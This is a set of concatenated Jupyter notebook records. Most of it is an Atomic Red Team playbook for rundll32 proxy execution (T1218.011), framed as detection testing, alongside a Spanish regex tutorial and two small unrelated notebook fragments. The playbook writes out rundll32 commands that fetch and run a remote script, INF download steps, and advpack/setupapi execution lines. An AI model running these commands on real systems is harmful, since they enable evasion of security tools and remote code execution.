dcn.load_training_dataset()\n\nutils.set_cuda_visible_devices(default_config['cuda_visible_devices'])", "_____no_output_____" ], [ "start_time = time.time()\nstats = DCE.compute_descriptor_statistics_on_dataset(dcn, dataset, num_images=100, save_to_file=True)\nelapsed = time.time() - start_time\nprint \"computing stats took %d seconds\" %(elapsed)\n\n\nprint \"entire img min\", stats['entire_image']['min']\nprint \"entire img max\", stats['entire_image']['max']\n\nprint \"mask img min\", stats['mask_image']['min']\nprint \"mask img max\", stats['mask_image']['max']", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72fa84e2cbd4280f43e685a751a8b1921525977
4,451
ipynb
Jupyter Notebook
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
12
2015-11-26T22:23:05.000Z
2021-03-23T21:10:53.000Z
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
1
2019-01-18T08:33:55.000Z
2019-01-18T08:33:55.000Z
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
4
2015-10-28T05:54:50.000Z
2019-05-09T22:23:11.000Z
25.58046
113
0.488205
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72fabd8bd13fbea1250fd293913f1042984c869
10,873
ipynb
Jupyter Notebook
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
8
2021-05-25T15:25:31.000Z
2021-11-08T07:14:45.000Z
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
1
2021-08-23T17:38:02.000Z
2021-10-12T06:58:19.000Z
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
2
2021-05-29T20:24:24.000Z
2021-08-05T23:44:12.000Z
50.808411
1,138
0.688494
[ [ [ "# T1218.011 - Signed Binary Proxy Execution: Rundll32\nAdversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", "_____no_output_____" ], [ "## Atomic Tests", "_____no_output_____" ] ], [ [ "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force", "_____no_output_____" ] ], [ [ "### Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject\nTest execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 1", "_____no_output_____" ] ], [ [ "### Atomic Test #2 - Rundll32 execute VBscript command\nTest execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.\nTechnique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/\nUpon execution calc.exe will be launched\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 2", "_____no_output_____" ] ], [ [ "### Atomic Test #3 - Rundll32 advpack.dll Execution\nTest execution of a command using rundll32.exe with advpack.dll.\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml\nUpon execution calc.exe will be launched\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 3 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 3", "_____no_output_____" ] ], [ [ "### Atomic Test #4 - Rundll32 ieadvpack.dll Execution\nTest execution of a command using rundll32.exe with ieadvpack.dll.\nUpon execution calc.exe will be launched\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 4 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 4", "_____no_output_____" ] ], [ [ "### Atomic Test #5 - Rundll32 syssetup.dll Execution\nTest execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 5 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 5", "_____no_output_____" ] ], [ [ "### Atomic Test #6 - Rundll32 setupapi.dll Execution\nTest execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 6 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 6", "_____no_output_____" ] ], [ [ "## Detection\nUse process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72fb28e02a4511e40072cc276b0697f3e3c6e52
376,010
ipynb
Jupyter Notebook
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
376,010
376,010
0.722989
[ [ [ "Importamos la libreria RE", "_____no_output_____" ] ], [ [ "import re", "_____no_output_____" ] ], [ [ "Para hacer pruebas y experimentos podemos utilizar el texto de la dirección: https://raw.githubusercontent.com/apimentelaUP/recursos/master/M%C3%A9xico_texto.txt", "_____no_output_____" ] ], [ [ "import requests\n\nurl = 'https://raw.githubusercontent.com/apimentelaUP/recursos/master/M%C3%A9xico_texto.txt'\npage = requests.get(url)\ntexto = page.text", "_____no_output_____" ], [ "texto", "_____no_output_____" ] ], [ [ "Recordemos que las ER son texto, y siempre y cuando no se incluya ninguno de los caracteres especiales, el texto formará una expresión regular que va a coincidir consigo mismo, asi se forman las ER mas simples.\n\nPara declarar una expresión regular, vamos a usar la función `re.compile()`", "_____no_output_____" ] ], [ [ "expresion_mexico = re.compile(r\"México\")", "_____no_output_____" ] ], [ [ "OJO: Presten atención a esa `'r'` justo antes de abrir las comillas del texto de la expresión regular, son importantes.\n\nEsa `'r'` le indica a Python que ese texto va a contener caracteres especiales de expresión regular. Python tiene caracteres especiales propios, de los cuáles varios coinciden con los de ER. Por lo tanto, si se omite la `'r'`, Python y la librería `re` se podrían \"pelear\" por ver a quién le corresponde esos símbolos. \n\nMejor usar la `'r'` para indicarle a Python que deje pasar el texto tal cual al intérprete de expresión regular. Para este caso en partícular no pasa nada, porque no hay tales símbolos, pero mejor hacerse la costumbre.", "_____no_output_____" ], [ "Podemos comenzar a usar esa expresión regular compilada para un proceso muy simple, buscarlo dentro del texto", "_____no_output_____" ] ], [ [ "busqueda = expresion_mexico.search(texto)\n\nprint(busqueda.group(0))", "México\n" ] ], [ [ "Y para sorpresa de nadie, lo que obtenemos es el mismo texto que queríamos buscar en primer lugar. Pero este ejemplo es importante para mostrar cómo se obtiene el resultado.\n\nPrimero, la función `er.search()` recibe el texto donde se va a buscar la expresión regular compilada y devuelve un resultado de esa búsqueda.\n\nPara poder observar la salida, necesitamos usar la función `.group(0)`. Mas adelante veremos como trabajar con los grupos de las expresiones regulares, pero por ahora simplemente confíen en mi que esa es la forma de obtener el resultado.", "_____no_output_____" ], [ "La función `er.search()` va a regresar únicamente la primer coincidencia que encuentre, si quieren encontrar todas, pueden usar la función `er.finditer()` para obtener un resultado iterable.", "_____no_output_____" ] ], [ [ "busqueda = expresion_mexico.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "México\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ] ], [ [ "El resultado será una lista con todas las apariciones de la palabra \"México\" en el texto. Cada uno de los resultados que regresa el iterador se comporta igual que el resultado de la función `er.search()`", "_____no_output_____" ], [ "#### Punto (`.`)", "_____no_output_____" ], [ "Ahora podemos comenzar con los símbolos especiales de las expresiones regulares, comenzaremos por el punto: `.`", "_____no_output_____" ] ], [ [ "expresion_punto = re.compile(r\".\")\nbusqueda = expresion_punto.finditer(texto)\n\ncontador = 0\nfor resultado in busqueda:\n print(resultado.group(0))\n contador += 1\n if contador >= 100 :\n break", "<\nd\no\nc\n \ni\nd\n=\n\"\n1\n8\n3\n0\n\"\n \nu\nr\nl\n=\n\"\nh\nt\nt\np\ns\n:\n/\n/\ne\ns\n.\nw\ni\nk\ni\np\ne\nd\ni\na\n.\no\nr\ng\n/\nw\ni\nk\ni\n?\nc\nu\nr\ni\nd\n=\n1\n8\n3\n0\n\"\n \nt\ni\nt\nl\ne\n=\n\"\nM\né\nx\ni\nc\no\n\"\n>\nM\né\nx\ni\nc\no\nM\né\nx\ni\nc\no\n \n(\n)\n,\n \no\nf\ni\nc\ni\na\n" ] ], [ [ "El punto es capaz de coincidir con cualquier caracter, el que sea, en el código puse un límite de 100 resultados para cortar la salida, de otra manera tendrán todo el texto, un caracter a la vez.\n\nUsarlo por sí mismo no tiene mucho sentido, pero tanto letras como símbolos se pueden usar en conjunto dentro de las expresiones regulares.", "_____no_output_____" ] ], [ [ "expresion_punto = re.compile(r\"M..ic.\")\nbusqueda = expresion_punto.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "México\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMejica\nMexica\nMexica\nMexica\nMexica\nMexica\nMexica\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMunici\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMunici\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMedici\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMexica\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMexica\nMéxico\nMexica\nMexica\nMexica\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMexica\nMéxico\nMexica\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ] ], [ [ "Esta búsqueda nos dará direrentes coincidencias similares a \"México\", por ejemplo con y sin acento, escrito con 'j' o con una diferente terminación.", "_____no_output_____" ], [ "#### Repetidores", "_____no_output_____" ], [ "En segundo lugar, veamos los símbolos repetidores: `+ *` . Ambos símbolos se usan DESPUES de UN caracter que se quiera repteir: `*` cualquier cantidad de veces (incluyendo cero veces); `+` para una o más veces.", "_____no_output_____" ] ], [ [ "expresion_mas = re.compile(r\".0+\")\nexpresion_asterisco = re.compile(r\".0*\")\n\nbusqueda_mas = expresion_mas.finditer(texto)\nbusqueda_asterisco = expresion_asterisco.finditer(texto)\n\nprint(\"########## RESULTADOS MAS ########## \")\nfor resultado in busqueda_mas:\n print(resultado.group(0))\n\nprint(\"########## RESULTADOS ASTERISCO ########## \")\ncontador = 0\nfor resultado in busqueda_asterisco:\n print(resultado.group(0))\n contador += 1\n if contador >= 100 :\n break", "########## RESULTADOS MAS ########## \n30\n30\n30\n20\n 000\n300\n10\n 0\n10\n 000\n30\n 000\n9000\n 000\n8000\n1000\n10\n500\n500\n500\n200\n200\n900\n900\n900\n300\n20\n300\n40\n300\n80\n10\n20\n90\n90\n10\n20\n20\n40\n50\n60\n70\n2000\n200\n100\n 000\n20\n10\n20\n200\n20\n20\n20\n20\n500\n10\n70\n20\n70\n80\n2000\n200\n20\n80\n50\n50\n20\n20\n20\n 0\n30\n10\n90\n40\n20\n50\n30\n50\n40\n10\n20\n1000\n500\n500\n50\n70\n60\n80\n1000\n3000\n30\n200\n 000\n10\n90\n 000\n500\n70\n 000\n200\n20\n20\n10\n30\n10\n20\n 000\n10\n40\n70\n70\n30\n200\n200\n70\n100\n 000\n70\n 000\n200\n20\n 000\n200\n200\n 0\n 0\n200\n600\n700\n200\n20\n10\n20\n80\n 000\n200\n200\n200\n10\n80\n40\n70\n200\n200\n20\n20\n200\n70\n200\n20\n200\n20\n10\n5000\n20\n 0\n20\n10\n 0\n 0\n60\n200\n200\n30\n900\n5000\n200\n50\n200\n 000\n50\n 000\n400\n20\n200\n200\n 000\n 000\n 0\n200\n10000\n40\n 000\n20\n10\n80\n20\n10\n20\n20\n10\n200\n90\n80\n200\n30\n200\n40\n20\n100\n100\n20\n10\n20\n30\n80\n50\n80\n2000\n20\n2000\n2000\n90\n60\n50\n20\n90\n80\n50\n200\n20\n10\n40\n 000\n600\n40\n400\n 000\n10\n10\n20\n 000\n2000\n100\n20\n80\n20\n20\n,000\n20\n20\n200\n20\n20\n20\n20\n90\n20\n10\n30\n5000\n 000\n500\n400\n100\n10\n50\n500\n5000\n5000\n50\n 000\n 000\n100\n 000\n400\n500\n20\n10\n20\n10\n30\n 000\n200\n20\n40\n70\n200\n20\n10\n10\n100\n20\n10\n10\n2000\n40\n70\n30\n40\n60\n50\n60\n70\n80\n70\n90\n20\n40\n50\n60\n500\n200\n20\n80\n40\n50\n200\n20\n 000\n200\n20\n10\n200\n200\n20\n 0\n20\n20\n10\n20\n10\n30\n20\n10\n70\n10\n200\n20\n200\n20\n20\n20\n200\n200\n200\n20\n20\n20\n20\n20\n20\n30\n20\n10\n90\n20\n50\n200\n20\n10\n200\n20\n900\n2000\n200\n200\n200\n200\n70\n20\n90\n20\n70\n20\n20\n200\n20\n10\n80\n2000\n200\n200\n20\n200\n20\n10\n20\n10\n20\n########## RESULTADOS ASTERISCO ########## \n<\nd\no\nc\n \ni\nd\n=\n\"\n1\n8\n30\n\"\n \nu\nr\nl\n=\n\"\nh\nt\nt\np\ns\n:\n/\n/\ne\ns\n.\nw\ni\nk\ni\np\ne\nd\ni\na\n.\no\nr\ng\n/\nw\ni\nk\ni\n?\nc\nu\nr\ni\nd\n=\n1\n8\n30\n\"\n \nt\ni\nt\nl\ne\n=\n\"\nM\né\nx\ni\nc\no\n\"\n>\nM\né\nx\ni\nc\no\nM\né\nx\ni\nc\no\n \n(\n)\n,\n \no\nf\ni\nc\ni\na\nl\nm\n" ] ], [ [ "Nuevamente le puse un límite a la salida de la expresión regular, o de lo contrario tendremos el texto completo un caracter a la vez (casi). ¿Por qué? porque el punto coincide con cualquier cosa, y si no tiene un cero a su derecha, no importa (por el asterisco), aún así va a coincidir. Si, por el contrario, si tiene ceros a la derecha, entonces va a coincidir con todos los que pueda y habrá mas de un caracter a la salida.\n\nA diferencia de la primera expresión regular, en donde se requiere que exista al menos un cero, pero puede haber más.", "_____no_output_____" ], [ "Es posible que busquemos que el elemento que se repite solo lo haga una cantidad específica de veces. Para esos casos, lo que se necesita son llaves: `{ }` . Dentro de las llaves se coloca el número de veces que se busca que se repita el caracter anterior. Tiene tres opciones: número fijo; rango o rango abierto (mínimo de veces).", "_____no_output_____" ] ], [ [ "# Se va a buscar mínimo 2 nueves, si se coloca un número después de la coma es un rango\n# y sin coma es una 